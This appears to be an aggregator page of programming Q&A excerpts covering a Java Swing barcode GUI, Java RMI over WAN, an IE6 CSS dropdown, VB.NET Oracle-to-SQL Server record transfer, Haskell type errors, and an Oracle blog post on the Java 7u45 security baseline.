label1.setFont(label1.getFont().deriveFont(label1.getFont().getStyle() | java.awt.Font.BOLD, 13)); label1.setText("Type a text:"); label1.setName("label1"); // NOI18N saveButton.setText("Save"); saveButton.addMouseListener(new java.awt.event.MouseAdapter() { public void mousePressed(java.awt.event.MouseEvent evt) { saveButtonMousePressed(evt); } }); javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane()); getContentPane().setLayout(layout); layout.setHorizontalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(layout.createSequentialGroup() .addGap(56, 56, 56) .addComponent(textBox, javax.swing.GroupLayout.PREFERRED_SIZE, 272, javax.swing.GroupLayout.PREFERRED_SIZE) .addContainerGap(72, Short.MAX_VALUE)) .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup() .addContainerGap(154, Short.MAX_VALUE) .addComponent(saveButton, javax.swing.GroupLayout.PREFERRED_SIZE, 102, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(144, 144, 144)) .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup() .addContainerGap(140, Short.MAX_VALUE) .addComponent(label1, javax.swing.GroupLayout.PREFERRED_SIZE, 133, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(127, 127, 127)) ); layout.setVerticalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(layout.createSequentialGroup() .addContainerGap() .addComponent(label1, javax.swing.GroupLayout.PREFERRED_SIZE, 25, javax.swing.GroupLayout.PREFERRED_SIZE) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(textBox, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) .addComponent(saveButton) .addContainerGap(193, Short.MAX_VALUE)) ); pack(); }// </editor-fold> @SuppressWarnings("static-access") private void saveButtonMousePressed(java.awt.event.MouseEvent evt) { JFileChooser file = new JFileChooser(); file.showSaveDialog(null); String data = file.getSelectedFile().getAbsolutePath(); String text = textBox.getText(); BarcodeGenerator barcodeFactory = new BarcodeGenerator(); try { barcodeFactory.generateBarcode(text, data); } catch (OutputException ex) { Logger.getLogger(uiFrame.class.getName()).log(Level.SEVERE, null, ex); } } /** * @param args the command line arguments */ // Variables declaration - do not modify private javax.swing.JLabel label1; private javax.swing.JButton saveButton; public javax.swing.JTextField textBox; // End of variables declaration } The Main Class (Main.java) package barcode; import javax.swing.JFrame; public class Main { public static void main(String[] args) { JFrame ui = new uiFrame(); ui.pack(); ui.show(); } }

    Read the article

  • Java RMI cannot connect to host from external client.

    - by Koe
    I've been using RMI in this project for a while. I've gotten the client program to connect (amongst other things) to the server when running it over my LAN, however when running it over the internet I'm running into the following exception: java.rmi.ConnectException: Connection refused to host: (private IP of host machine); nested exception is: java.net.ConnectException: Connection timed out: connect at sun.rmi.transport.tcp.TCPEndpoint.newSocket(Unknown Source) at sun.rmi.transport.tcp.TCPChannel.createConnection(Unknown Source) at sun.rmi.transport.tcp.TCPChannel.newConnection(Unknown Source) at sun.rmi.server.UnicastRef.invoke(Unknown Source) at java.rmi.server.RemoteObjectInvocationHandler.invokeRemoteMethod(Unknown Source) at java.rmi.server.RemoteObjectInvocationHandler.invoke(Unknown Source) at $Proxy1.ping(Unknown Source) at client.Launcher$PingLabel.runPing(Launcher.java:366) at client.Launcher$PingLabel.<init>(Launcher.java:353) at client.Launcher.setupContentPane(Launcher.java:112) at client.Launcher.<init>(Launcher.java:99) at client.Launcher.main(Launcher.java:59) Caused by: java.net.ConnectException: Connection timed out: connect at java.net.PlainSocketImpl.socketConnect(Native Method) at java.net.PlainSocketImpl.doConnect(Unknown Source) at java.net.PlainSocketImpl.connectToAddress(Unknown Source) at java.net.PlainSocketImpl.connect(Unknown Source) at java.net.SocksSocketImpl.connect(Unknown Source) at java.net.Socket.connect(Unknown Source) at java.net.Socket.connect(Unknown Source) at java.net.Socket.<init>(Unknown Source) at java.net.Socket.<init>(Unknown Source) at sun.rmi.transport.proxy.RMIDirectSocketFactory.createSocket(Unknown Source) at sun.rmi.transport.proxy.RMIMasterSocketFactory.createSocket(Unknown Source) ... 12 more This error is remeniscent of my early implementation of RMI and I can obtain the error verbatum if I run the client locally without the server program running as well. To me Connection Timed Out means a problem with the server's response. Here's the client initiation: public static void main(String[] args) { try { String host = "<WAN IP>"; Registry registry = LocateRegistry.getRegistry(host, 1099); Login lstub = (Login) registry.lookup("Login Server"); Information istub = (Information) registry.lookup("Game Server"); new Launcher(istub, lstub); } catch (RemoteException e) { System.err.println("Client exception: " + e.toString()); e.printStackTrace(); } catch (NotBoundException e) { System.err.println("Client exception: " + e.toString()); e.printStackTrace(); } } Interestingly enough no Remote Exception is thrown here. Here's the server initiation: public static void main(String args[]) { try { GameServer gobj = new GameServer(); Information gstub = (Information) UnicastRemoteObject.exportObject( gobj, 1099); Registry registry = LocateRegistry.createRegistry(1099); registry.bind("Game Server", gstub); LoginServer lobj = new LoginServer(gobj); Login lstub = (Login) UnicastRemoteObject.exportObject(lobj, 7099); // Bind the remote object's stub in the registry registry.bind("Login Server", lstub); System.out.println("Server ready"); } catch (Exception e) { System.err.println("Server exception: " + e.toString()); e.printStackTrace(); } } Bad practice with the catch(Exception e) I know but bear with me. Up to this stage I know it works fine over the LAN, here's where the exception occurs over the WAN and is the first place a method in the server is called: private class PingLabel extends JLabel { private static final long serialVersionUID = 1L; public PingLabel() { super(""); runPing(); } public void setText(String text) { super.setText("Ping: " + text + "ms"); } public void runPing() { try { PingThread pt = new PingThread(); gameServer.ping(); pt.setRecieved(true); setText("" + pt.getTime()); } catch (RemoteException e) { e.printStackTrace(); } } } That's a label placed on the launcher as a ping test. the method ping(), in gameserver does nothing, as in is a null method. It's worth noting also that ports 1099 and 7099 are forwarded to the server machine (which should be obvious from the stack trace). Can anyone see anyting I'm missing/doing wrong? If you need any more information just ask. EDIT: I'm practically certain the problem has nothing to do with my router settings. When disabling my port forwarding settings I get a slightly different error: Client exception: java.rmi.ConnectException: Connection refused to host: (-WAN IP NOT LOCAL IP-); but it appears both on the machine locally connected to the server and on the remote machine. In addition, I got it to work seamlessly when connecting the server straight tho the modem (cutting out the router. I can only conclude the problem is in my router's settings but can't see where (I've checked and double checked the port forwarding page). That's the only answer i can come up with.

    Read the article

  • Help for CSS Menu Dropdown, FF OK and IE6 Problem

    - by Taruhku
    IE Problem, FF OK. Please help..???? Screen Shoot problem click here This is my CSS dolphincontainer { position:relative; height:56px; color:#E0E0E0; background:#143D55; width:100%; font-family:Tahoma; left: 0px; } dolphinnav {position:absolute;;height:33px;font-size:12px;font-weight:bold;background:#fff url(images/dolphin_bg.gif) repeat-x bottom left;padding:0 0 0 10px;width:975px;} dolphinnav ul {margin:0;padding:0;list-style-type:none;width:auto;float:left;} dolphinnav ul li {display:block;float:left;margin:0 1px;} dolphinnav ul li a {display:block;float:left;color:#001b2c;text-decoration:none;padding:0 0 0 10px;height:33px;} dolphinnav ul li a span {padding:12px 20px 0 0;height:21px;float:left;font-weight:bold;} dolphinnav ul li a:hover {color:#fff;background:transparent url(images/dolphin_bg-OVER.gif) repeat-x bottom left;} dolphinnav ul li a:hover span {display:block;width:auto;cursor:pointer;} dolphinnav ul li a.current,#dolphinnav ul li a.current:hover {color:#fff;background:#00517e url(images/dolphin_left-ON.gif) no-repeat top left;line-height:275%;} dolphinnav ul li a.current span {display:block;padding:0 20px 0 0;width:auto;background:#00517e url(images/dolphin_right-ON.gif) no-repeat top right;height:33px;} .tuckUp { display:block; width:90px; height:30px; overflow:hidden; cursor:pointer; } .pullDown { width:90px; height:56px; } .item a:link, .item a:visited { display:inline; float:left; background:#fff url(images/dolphin_bg.gif) repeat-x top left;padding:0 0 0 10px; text-align:left; color:#444; font-size:11px; font-weight:bold; text-decoration:none; line-height:25px; margin:0 5px 0px 0px; width:80px; } .item a:hover { display:inline; float:left; background:#39c; color:#FFF; text-decoration:none; text-align:left; font-size:11px; font-weight:700; font-weight:bold; line-height:25px; padding:0 0 0 10px; margin:0 5px 0px 0px; width:80px; } HTML: <div id="dolphincontainer"> <div id="dolphinnav"> <ul> <li><a href="index.php"><span>Home</span></a></li> <li><a href="chooseus.php"><span>Why Choose Us</span></a></li> <li><a href="peraturan.php"><span>Rules</span></a></li> <li class="tuckUp" onmousemove="this.className='pullDown'" onmouseout="this.className='tuckUp'"><a href="#"><span>Transaction</span></a> <div class="item"> <a href="drop1.php">Drop Down 1</a><br /> <a href="drop2.php">Drop Down 2</a></a><br /> <a href="drop3.php">Drop Down 3</a><br /> </div> </li> <li><a href="download.php"><span>Download</span></a></li> <li><a href="aboutus.php"><span>About Us</span></a></li> <li><a href="help.php" class="current"><span>Support</span></a></li> <li><a href="promo.php"><span><font color="#FF0000"><blink>PROMO</blink> </font></span></a></li> </ul> </div> </div>

    Read the article

  • Fastest way to move records from a oracle DB into MS sql server after processing

    - by user347748
    Hi.. Ok this is the scenario...I have a table in Oracle that acts like a queue... A VB.net program reads the queue and calls a stored proc in MS SQL Server that processes and then inserts the message into another SQL server table and then deletes the record from the oracle table. We use a datareader to read the records from Oracle and then call the stored proc for each of the records. The program seems to be a little slow. The stored procedure itself isnt slow. The SP by itself when called in a loop can process about 2000 records in 20 seconds. BUt when called from the .Net program, the execution time is about 5 records per second. I have seen that most of the time consumed is in calling the stored procedure and waiting for it to return. Is there a better way of doing this? Here is a snippet of the actual code Function StartDataXfer() As Boolean Dim status As Boolean = False Try SqlConn.Open() OraConn.Open() c.ErrorLog(Now.ToString & "--Going to Get the messages from oracle", 1) If GetMsgsFromOracle() Then c.ErrorLog(Now.ToString & "--Got messages from oracle", 1) If ProcessMessages() Then c.ErrorLog(Now.ToString & "--Finished Processing all messages in the queue", 0) status = True Else c.ErrorLog(Now.ToString & "--Failed to Process all messages in the queue", 0) status = False End If Else status = True End If StartDataXfer = status Catch ex As Exception Finally SqlConn.Close() OraConn.Close() End Try End Function Private Function GetMsgsFromOracle() As Boolean Try OraDataAdapter = New OleDb.OleDbDataAdapter OraDataTable = New System.Data.DataTable OraSelCmd = New OleDb.OleDbCommand GetMsgsFromOracle = False With OraSelCmd .CommandType = CommandType.Text .Connection = OraConn .CommandText = GetMsgSql End With OraDataAdapter.SelectCommand = OraSelCmd OraDataAdapter.Fill(OraDataTable) If OraDataTable.Rows.Count > 0 Then GetMsgsFromOracle = True End If Catch ex As Exception GetMsgsFromOracle = False End Try End Function Private Function ProcessMessages() As Boolean Try ProcessMessages = False PrepareSQLInsert() PrepOraDel() i = 0 Dim Method As Integer Dim OraDataRow As DataRow c.ErrorLog(Now.ToString & "--Going to call message sending procedure", 2) For Each OraDataRow In OraDataTable.Rows With OraDataRow Method = GetMethod(.Item(0)) SQLInsCmd.Parameters("RelLifeTime").Value = c.RelLifetime SQLInsCmd.Parameters("Param1").Value = Nothing SQLInsCmd.Parameters("ID").Value = GenerateTransactionID() ' Nothing SQLInsCmd.Parameters("UID").Value = Nothing SQLInsCmd.Parameters("Param").Value = Nothing SQLInsCmd.Parameters("Credit").Value = 0 SQLInsCmd.ExecuteNonQuery() 'check the return value If SQLInsCmd.Parameters("ReturnValue").Value = 1 And SQLInsCmd.Parameters("OutPutParam").Value = 0 Then 'success 'delete the input record from the source table once it is logged c.ErrorLog(Now.ToString & "--Moved record successfully", 2) OraDataAdapter.DeleteCommand.Parameters("P(0)").Value = OraDataRow.Item(6) OraDataAdapter.DeleteCommand.ExecuteNonQuery() c.ErrorLog(Now.ToString & "--Deleted record successfully", 2) OraDataAdapter.Update(OraDataTable) c.ErrorLog(Now.ToString & "--Committed record successfully", 2) i = i + 1 Else 'failure c.ErrorLog(Now.ToString & "--Failed to exec: " & c.DestIns & "Status: " & SQLInsCmd.Parameters("OutPutParam").Value & " and TrackId: " & SQLInsCmd.Parameters("TrackID").Value.ToString, 0) End If If File.Exists("stop.txt") Then c.ErrorLog(Now.ToString & "--Stop File Found", 1) 'ProcessMessages = True 'Exit Function Exit For End If End With Next OraDataAdapter.Update(OraDataTable) c.ErrorLog(Now.ToString & "--Updated Oracle Table", 1) c.ErrorLog(Now.ToString & "--Moved " & i & " records from Oracle to SQL Table", 1) ProcessMessages = True Catch ex As Exception ProcessMessages = False c.ErrorLog(Now.ToString & "--MoveMsgsToSQL: " & ex.Message, 0) Finally OraDataTable.Clear() OraDataTable.Dispose() OraDataAdapter.Dispose() OraDelCmd.Dispose() OraDelCmd = Nothing OraSelCmd = Nothing OraDataTable = Nothing OraDataAdapter = Nothing End Try End Function Public Function GenerateTransactionID() As Int64 Dim SeqNo As Int64 Dim qry As String Dim SqlTransCmd As New OleDb.OleDbCommand qry = " select seqno from StoreSeqNo" SqlTransCmd.CommandType = CommandType.Text SqlTransCmd.Connection = SqlConn SqlTransCmd.CommandText = qry SeqNo = SqlTransCmd.ExecuteScalar If SeqNo > 2147483647 Then qry = "update StoreSeqNo set seqno=1" SqlTransCmd.CommandText = qry SqlTransCmd.ExecuteNonQuery() GenerateTransactionID = 1 Else qry = "update StoreSeqNo set seqno=" & SeqNo + 1 SqlTransCmd.CommandText = qry SqlTransCmd.ExecuteNonQuery() GenerateTransactionID = SeqNo End If End Function Private Function PrepareSQLInsert() As Boolean 'function to prepare the insert statement for the insert into the SQL stmt using 'the sql procedure SMSProcessAndDispatch Try Dim dr As DataRow SQLInsCmd = New OleDb.OleDbCommand With SQLInsCmd .CommandType = CommandType.StoredProcedure .Connection = SqlConn .CommandText = SQLInsProc .Parameters.Add("ReturnValue", OleDb.OleDbType.Integer) .Parameters("ReturnValue").Direction = ParameterDirection.ReturnValue .Parameters.Add("OutPutParam", OleDb.OleDbType.Integer) .Parameters("OutPutParam").Direction = ParameterDirection.Output .Parameters.Add("TrackID", OleDb.OleDbType.VarChar, 70) .Parameters.Add("RelLifeTime", OleDb.OleDbType.TinyInt) .Parameters("RelLifeTime").Direction = ParameterDirection.Input .Parameters.Add("Param1", OleDb.OleDbType.VarChar, 160) .Parameters("Param1").Direction = ParameterDirection.Input .Parameters.Add("TransID", OleDb.OleDbType.VarChar, 70) .Parameters("TransID").Direction = ParameterDirection.Input .Parameters.Add("UID", OleDb.OleDbType.VarChar, 20) .Parameters("UID").Direction = ParameterDirection.Input .Parameters.Add("Param", OleDb.OleDbType.VarChar, 160) .Parameters("Param").Direction = ParameterDirection.Input .Parameters.Add("CheckCredit", OleDb.OleDbType.Integer) .Parameters("CheckCredit").Direction = ParameterDirection.Input .Prepare() End With Catch ex As Exception c.ErrorLog(Now.ToString & "--PrepareSQLInsert: " & ex.Message) End Try End Function Private Function PrepOraDel() As Boolean OraDelCmd = New OleDb.OleDbCommand Try PrepOraDel = False With OraDelCmd .CommandType = CommandType.Text .Connection = OraConn .CommandText = DelSrcSQL .Parameters.Add("P(0)", OleDb.OleDbType.VarChar, 160) 'RowID .Parameters("P(0)").Direction = ParameterDirection.Input .Prepare() End With OraDataAdapter.DeleteCommand = OraDelCmd PrepOraDel = True Catch ex As Exception PrepOraDel = False End Try End Function WHat i would like to know is, if there is anyway to speed up this program? Any ideas/suggestions would be highly appreciated... Regardss, Chetan

    Read the article

  • Fastest way to move records from an Oracle database into SQL Server

    - by user347748
    Ok this is the scenario... I have a table in Oracle that acts like a queue... A VB.net program reads the queue and calls a stored proc in SQL Server that processes and then inserts the message into another SQL Server table and then deletes the record from the oracle table. We use a DataReader to read the records from Oracle and then call the stored proc for each of the records. The program seems to be a little slow. The stored procedure itself isn't slow. The SP by itself when called in a loop can process about 2000 records in 20 seconds. But when called from the .Net program, the execution time is about 5 records per second. I have seen that most of the time consumed is in calling the stored procedure and waiting for it to return. Is there a better way of doing this? Here is a snippet of the actual code Function StartDataXfer() As Boolean Dim status As Boolean = False Try SqlConn.Open() OraConn.Open() c.ErrorLog(Now.ToString & "--Going to Get the messages from oracle", 1) If GetMsgsFromOracle() Then c.ErrorLog(Now.ToString & "--Got messages from oracle", 1) If ProcessMessages() Then c.ErrorLog(Now.ToString & "--Finished Processing all messages in the queue", 0) status = True Else c.ErrorLog(Now.ToString & "--Failed to Process all messages in the queue", 0) status = False End If Else status = True End If StartDataXfer = status Catch ex As Exception Finally SqlConn.Close() OraConn.Close() End Try End Function Private Function GetMsgsFromOracle() As Boolean Try OraDataAdapter = New OleDb.OleDbDataAdapter OraDataTable = New System.Data.DataTable OraSelCmd = New OleDb.OleDbCommand GetMsgsFromOracle = False With OraSelCmd .CommandType = CommandType.Text .Connection = OraConn .CommandText = GetMsgSql End With OraDataAdapter.SelectCommand = OraSelCmd OraDataAdapter.Fill(OraDataTable) If OraDataTable.Rows.Count > 0 Then GetMsgsFromOracle = True End If Catch ex As Exception GetMsgsFromOracle = False End Try End Function Private Function ProcessMessages() As Boolean Try ProcessMessages = False PrepareSQLInsert() PrepOraDel() i = 0 Dim Method As Integer Dim OraDataRow As DataRow c.ErrorLog(Now.ToString & "--Going to call message sending procedure", 2) For Each OraDataRow In OraDataTable.Rows With OraDataRow Method = GetMethod(.Item(0)) SQLInsCmd.Parameters("RelLifeTime").Value = c.RelLifetime SQLInsCmd.Parameters("Param1").Value = Nothing SQLInsCmd.Parameters("ID").Value = GenerateTransactionID() ' Nothing SQLInsCmd.Parameters("UID").Value = Nothing SQLInsCmd.Parameters("Param").Value = Nothing SQLInsCmd.Parameters("Credit").Value = 0 SQLInsCmd.ExecuteNonQuery() 'check the return value If SQLInsCmd.Parameters("ReturnValue").Value = 1 And SQLInsCmd.Parameters("OutPutParam").Value = 0 Then 'success 'delete the input record from the source table once it is logged c.ErrorLog(Now.ToString & "--Moved record successfully", 2) OraDataAdapter.DeleteCommand.Parameters("P(0)").Value = OraDataRow.Item(6) OraDataAdapter.DeleteCommand.ExecuteNonQuery() c.ErrorLog(Now.ToString & "--Deleted record successfully", 2) OraDataAdapter.Update(OraDataTable) c.ErrorLog(Now.ToString & "--Committed record successfully", 2) i = i + 1 Else 'failure c.ErrorLog(Now.ToString & "--Failed to exec: " & c.DestIns & "Status: " & SQLInsCmd.Parameters("OutPutParam").Value & " and TrackId: " & SQLInsCmd.Parameters("TrackID").Value.ToString, 0) End If If File.Exists("stop.txt") Then c.ErrorLog(Now.ToString & "--Stop File Found", 1) 'ProcessMessages = True 'Exit Function Exit For End If End With Next OraDataAdapter.Update(OraDataTable) c.ErrorLog(Now.ToString & "--Updated Oracle Table", 1) c.ErrorLog(Now.ToString & "--Moved " & i & " records from Oracle to SQL Table", 1) ProcessMessages = True Catch ex As Exception ProcessMessages = False c.ErrorLog(Now.ToString & "--MoveMsgsToSQL: " & ex.Message, 0) Finally OraDataTable.Clear() OraDataTable.Dispose() OraDataAdapter.Dispose() OraDelCmd.Dispose() OraDelCmd = Nothing OraSelCmd = Nothing OraDataTable = Nothing OraDataAdapter = Nothing End Try End Function Public Function GenerateTransactionID() As Int64 Dim SeqNo As Int64 Dim qry As String Dim SqlTransCmd As New OleDb.OleDbCommand qry = " select seqno from StoreSeqNo" SqlTransCmd.CommandType = CommandType.Text SqlTransCmd.Connection = SqlConn SqlTransCmd.CommandText = qry SeqNo = SqlTransCmd.ExecuteScalar If SeqNo > 2147483647 Then qry = "update StoreSeqNo set seqno=1" SqlTransCmd.CommandText = qry SqlTransCmd.ExecuteNonQuery() GenerateTransactionID = 1 Else qry = "update StoreSeqNo set seqno=" & SeqNo + 1 SqlTransCmd.CommandText = qry SqlTransCmd.ExecuteNonQuery() GenerateTransactionID = SeqNo End If End Function Private Function PrepareSQLInsert() As Boolean 'function to prepare the insert statement for the insert into the SQL stmt using 'the sql procedure SMSProcessAndDispatch Try Dim dr As DataRow SQLInsCmd = New OleDb.OleDbCommand With SQLInsCmd .CommandType = CommandType.StoredProcedure .Connection = SqlConn .CommandText = SQLInsProc .Parameters.Add("ReturnValue", OleDb.OleDbType.Integer) .Parameters("ReturnValue").Direction = ParameterDirection.ReturnValue .Parameters.Add("OutPutParam", OleDb.OleDbType.Integer) .Parameters("OutPutParam").Direction = ParameterDirection.Output .Parameters.Add("TrackID", OleDb.OleDbType.VarChar, 70) .Parameters.Add("RelLifeTime", OleDb.OleDbType.TinyInt) .Parameters("RelLifeTime").Direction = ParameterDirection.Input .Parameters.Add("Param1", OleDb.OleDbType.VarChar, 160) .Parameters("Param1").Direction = ParameterDirection.Input .Parameters.Add("TransID", OleDb.OleDbType.VarChar, 70) .Parameters("TransID").Direction = ParameterDirection.Input .Parameters.Add("UID", OleDb.OleDbType.VarChar, 20) .Parameters("UID").Direction = ParameterDirection.Input .Parameters.Add("Param", OleDb.OleDbType.VarChar, 160) .Parameters("Param").Direction = ParameterDirection.Input .Parameters.Add("CheckCredit", OleDb.OleDbType.Integer) .Parameters("CheckCredit").Direction = ParameterDirection.Input .Prepare() End With Catch ex As Exception c.ErrorLog(Now.ToString & "--PrepareSQLInsert: " & ex.Message) End Try End Function Private Function PrepOraDel() As Boolean OraDelCmd = New OleDb.OleDbCommand Try PrepOraDel = False With OraDelCmd .CommandType = CommandType.Text .Connection = OraConn .CommandText = DelSrcSQL .Parameters.Add("P(0)", OleDb.OleDbType.VarChar, 160) 'RowID .Parameters("P(0)").Direction = ParameterDirection.Input .Prepare() End With OraDataAdapter.DeleteCommand = OraDelCmd PrepOraDel = True Catch ex As Exception PrepOraDel = False End Try End Function WHat i would like to know is, if there is anyway to speed up this program? Any ideas/suggestions would be highly appreciated... Regardss, Chetan

    Read the article

  • Couldn't match expected type - Haskell Code

    - by wvyar
    I'm trying to learn Haskell, but the small bit of sample code I tried to write is running into a fairly large amount of "Couldn't match expected type" errors. Can anyone give me some guidance as to what I'm doing wrong/how I should go about this? These are the errors, but I'm not really sure how I should be writing my code. toDoSchedulerSimple.hs:6:14: Couldn't match expected type `[t0]' with actual type `IO String' In the return type of a call of `readFile' In a stmt of a 'do' block: f <- readFile inFile In the expression: do { f <- readFile inFile; lines f } toDoSchedulerSimple.hs:27:9: Couldn't match expected type `[a0]' with actual type `IO ()' In the return type of a call of `putStr' In a stmt of a 'do' block: putStr "Enter task name: " In the expression: do { putStr "Enter task name: "; task <- getLine; return inFileArray : task } toDoSchedulerSimple.hs:34:9: Couldn't match expected type `IO ()' with actual type `[a0]' In a stmt of a 'do' block: putStrLn "Your task is: " ++ (inFileArray !! i) In the expression: do { i <- randomRIO (0, (length inFileArray - 1)); putStrLn "Your task is: " ++ (inFileArray !! i) } In an equation for `getTask': getTask inFileArray = do { i <- randomRIO (0, (length inFileArray - 1)); putStrLn "Your task is: " ++ (inFileArray !! i) } toDoSchedulerSimple.hs:41:9: Couldn't match expected type `[a0]' with actual type `IO ()' In the return type of a call of `putStr' In a stmt of a 'do' block: putStr "Enter the task you would like to end: " In the expression: do { putStr "Enter the task you would like to end: "; task <- getLine; filter (endTaskCheck task) inFileArray } toDoSchedulerSimple.hs:60:53: Couldn't match expected type `IO ()' with actual type `[String] -> IO ()' In a stmt of a 'do' block: schedulerSimpleMain In the expression: do { (getTask inFileArray); schedulerSimpleMain } In a case alternative: "get-task" -> do { (getTask inFileArray); schedulerSimpleMain } This is the code itself. I think it's fairly straightforward, but the idea is to run a loop, take input, and perform actions based off of it by calling other functions. import System.Random (randomRIO) import Data.List (lines) initializeFile :: [char] -> [String] initializeFile inFile = do f <- readFile inFile let parsedFile = lines f return parsedFile displayHelp :: IO() displayHelp = do putStrLn "Welcome to To Do Scheduler Simple, written in Haskell." putStrLn "Here are some commands you might find useful:" putStrLn " 'help' : Display this menu." putStrLn " 'quit' : Exit the program." putStrLn " 'new-task' : Create a new task." putStrLn " 'get-task' : Randomly select a task." putStrLn " 'end-task' : Mark a task as finished." putStrLn " 'view-tasks' : View all of your tasks." quit :: IO() quit = do putStrLn "We're very sad to see you go...:(" putStrLn "Come back soon!" createTask :: [String] -> [String] createTask inFileArray = do putStr "Enter task name: " task <- getLine return inFileArray:task getTask :: [String] -> IO() getTask inFileArray = do i <- randomRIO (0, (length inFileArray - 1)) putStrLn "Your task is: " ++ (inFileArray !! i) endTaskCheck :: String -> String -> Bool endTaskCheck str1 str2 = str1 /= str2 endTask :: [String] -> [String] endTask inFileArray = do putStr "Enter the task you would like to end: " task <- getLine return filter (endTaskCheck task) inFileArray viewTasks :: [String] -> IO() viewTasks inFileArray = case inFileArray of [] -> do putStrLn "\nEnd of tasks." _ -> do putStrLn (head inFileArray) viewTasks (tail inFileArray) schedulerSimpleMain :: [String] -> IO() schedulerSimpleMain inFileArray = do putStr "SchedulerSimple> " input <- getLine case input of "help" -> displayHelp "quit" -> quit "new-task" -> schedulerSimpleMain (createTask inFileArray) "get-task" -> do (getTask inFileArray); schedulerSimpleMain "end-task" -> schedulerSimpleMain (endTask inFileArray) "view-tasks" -> do (viewTasks inFileArray); schedulerSimpleMain _ -> do putStrLn "Invalid input."; schedulerSimpleMain main :: IO() main = do putStr "What is the name of the schedule? " sName <- getLine schedulerSimpleMain (initializeFile sName) Thanks, and apologies if this isn't the correct place to be asking such a question.

    Read the article

  • Updated Security Baseline (7u45) impacts Java 7u40 and before with High Security settings

    - by costlow
    The Java Security Baseline has been increased from 7u25 to 7u45.  For versions of Java below 7u45, this means unsigned Java applets or Java applets that depend on Javascript LiveConnect calls will be blocked when using the High Security setting in the Java Control Panel. This issue only affects Applets and Web Start applications. It does not affect other types of Java applications. The Short Answer Users upgrading to Java 7 update 45 will automatically fix this and is strongly recommended. The More Detailed Answer There are two items involved as described on the deployment flowchart: The Security Baseline – a dynamically updated attribute that checks to see which Java version contains the most recent security patches. The Security Slider – the user-controlled setting of when to prompt/run/block applets. The Security Baseline Java clients periodically check in to understand what version contains the most recent security patches. Versions are released in-between that contain bug fixes. For example: 7u25 (July 2013) was the previous secure baseline. 7u40 contained bug fixes. Because this did not contain security patches, users were not required to upgrade and were welcome to remain on 7u25. When 7u45 was released (October, 2013), this critical patch update contained security patches and raised the secure baseline. Users are required to upgrade from earlier versions. For users that are not regularly connected to the internet, there is a built in Expiration Date. Because of the pre-established quarterly critical patch updates, we are able to determine an approximate date of the next version. A critical patch released in July will have its successor released, at latest, in July + 3 months: October. The Security Slider The security slider is located within the Java control panel and determines which Applets & Web Start applications will prompt, which will run, and which will be blocked. One of the questions used to determine prompt/run/block is, “At or Above the Security Baseline.” The Combination JavaScript calls made from LiveConnect do not reside within signed JAR files, so they are considered to be unsigned code. This is correct within networked systems even if the domain uses HTTPS because signed JAR files represent signed "data at rest" whereas TLS (often called SSL) literally stands for "Transport Level Security" and secures the communication channel, not the contents/code within the channel. The resulting flow of users who click "update later" is: Is the browser plug-in registered and allowed to run? Yes. Does a rule exist for this RIA? No rules apply. Does the RIA have a valid signature? Yes and not revoked. Which security prompt is needed? JRE is below the baseline. This is because 7u45 is the baseline and the user, clicked "upgrade later." Under the default High setting, Unsigned code is set to "Don’t Run" so users see: Additional Notes End Users can control their own security slider within the control panel. System Administrators can customize the security slider during automated installations. As a reminder, in the future, Java 7u51 (January 2014) will block unsigned and self-signed Applets & Web Start applications by default.

    Read the article

  • Visual Studio Exceptions dialogs

    - by Daniel Moth
    Previously I covered step 1 of live debugging with start and attach. Once the debugger is attached, you want to go to step 2 of live debugging, which is to break. One way to break under the debugger is to do nothing, and just wait for an exception to occur in your code. This is true for all types of code that you debug in Visual Studio, and let's consider the following piece of C# code:3: static void Main() 4: { 5: try 6: { 7: int i = 0; 8: int r = 5 / i; 9: } 10: catch (System.DivideByZeroException) {/*gulp. sue me.*/} 11: System.Console.ReadLine(); 12: } If you run this under the debugger do you expect an exception on line 8? It is a trick question: you have to know whether I have configured the debugger to break when exceptions are thrown (first-chance exceptions) or only when they are unhandled. The place you do that is in the Exceptions dialog which is accessible from the Debug->Exceptions menu and on my installation looks like this: Note that I have checked all CLR exceptions. I could have expanded (like shown for the C++ case in my screenshot) and selected specific exceptions. To read more about this dialog, please read the corresponding Exception Handling debugging msdn topic and all its subtopics. So, for the code above, the debugger will break execution due to the thrown exception (exactly as if the try..catch was not there), so I see the following Exception Thrown dialog: Note the following: I can hit continue (or hit break and then later continue) and the program will continue fine since I have a catch handler. If this was an unhandled exception, then that is what the dialog would say (instead of first chance exception) and continuing would crash the app. That hyperlinked text ("Open Exception Settings") opens the Exceptions dialog I described further up. The coolest thing to note is the checkbox - this is new in this latest release of Visual Studio: it is a shortcut to the checkbox in the Exceptions dialog, so you don't have to open it to change this setting for this specific exception - you can toggle that option right from this dialog. Finally, if you try the code above on your system, you may observe a couple of differences from my screenshots. The first is that you may have an additional column of checkboxes in the Exceptions dialog. The second is that the last dialog I shared may look different to you. It all depends on the Debug->Options settings, and the two relevant settings are in this screenshot: The Exception assistant is what configures the look of the UI when the debugger wants to indicate exception to you, and the Just My Code setting controls the extra column in the Exception dialog. You can read more about those options on MSDN: How to break on User-Unhandled exceptions (plus Gregg’s post) and Exception Assistant. Before I leave you to go play with this stuff a bit more, please note that this level of debugging is now available for JavaScript too, and if you are looking at the Exceptions dialog and wondering what the "GPU Memory Access Exceptions" node is about, stay tuned on the C++ AMP blog ;-) Comments about this post by Daniel Moth welcome at the original blog.

    Read the article

  • JMSContext, @JMSDestinationDefintion, DefaultJMSConnectionFactory with simplified JMS API: TOTD #213

    - by arungupta
